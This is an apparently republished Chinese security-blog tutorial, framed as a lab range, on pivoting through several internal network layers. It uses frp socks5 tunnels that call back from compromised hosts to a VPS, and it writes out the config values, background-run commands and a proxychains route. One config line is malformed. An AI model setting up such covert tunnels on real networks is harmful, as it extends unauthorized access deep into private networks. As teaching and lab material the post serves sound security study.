Tips +1
靶场场景如下
第一层代理
1、配置VPSfrps,然后启动
2、配置第一层网络,我们把边界做为第一层,配置如下
Windows 后台运行
start /b frps -c frps.ini
这样即使CTRL +C也不会断开
Linux 后台运行
nohup ./frps -c ./frps.ini >/dev/null 2>&1 &
停止:
先找到pid进程
ps -aux|grep frp| grep -v grep
例如找到进程为 6666
kill -9 6666
配置
[common]
server_addr = 82.157.30.43
server_port = 58005
token = 130130130
[socks_test1]
remote_port = 10000
plugin = socks5
use_encryption = true
use_compression = true
启动
chmod +777 frpc
nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &
3、测试
我们在kali 上配置proxychian 客户端代理,实现对流量进行转发,从而访问内网二层网络服务
上面我们分别用proxychains客户端、浏览器插件代理、curl 工具代理均实现了如下场景。
第二层代理
通过上面的代理我们拿下了第二次网络的目标主机,那么接下来就需要对第三层网络进行渗透了。
在我们内网做第二层代理是访问不到第三层网络的,如下示例:
1、边界主机(第一层主机)
要实现对第三层网络的渗透,这里我们需要将第一层主机做为节点既做vps的客户端也做第二层网络的服务端(frps和frpc同时开启),从而实现访问第三层网络
frps.ini
--------------------------------------
[common]
#服务端监听端口,默认7000。监听来自客户端的流量请求
bind_port = 192.168.22.128
bind_port = 7000
--------------------------------------
启动
chmod +777 frps
./frps -c ./frps.ini
2、第二层代理客户端(第二层主机)
3、测试
我们在proxychain 工具配置项增加一个socks5代理
成功访问到第三层网络的web服务,接下来我们就可以对第三层网络进行渗透了。我们也可以看到路由如下:
Strict chain ... 82.157.30.43:10000 ... 192.168.22.128:20000 ... 192.168.33.33:80 ... OK
第三层代理
通过第一二层的代理我们成功渗透到第三层网络并获取第三层网络主机权限,接下来需要开启第三层的代理对,第四层网络继续渗透。方法同上,此时我们需要把第二层主机ubuntu做为第二个节点(同上既客户端也做服务端)
1、服务端(第二层主机)
2、客户端(第三层主机)
3、测试
最后,我们做了三个代理成功访问第四层的网络,实现了多层代理内网穿透。
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【Tips】多层内网代理穿透
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论